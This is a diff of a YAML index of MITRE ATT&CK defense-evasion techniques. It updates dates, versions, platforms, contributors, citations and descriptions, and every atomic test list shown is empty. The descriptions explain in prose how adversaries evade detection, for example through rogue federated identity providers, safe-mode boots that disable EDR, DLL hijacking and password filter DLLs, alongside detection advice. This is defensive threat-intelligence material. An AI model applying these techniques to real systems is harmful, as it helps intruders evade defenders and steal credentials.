@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
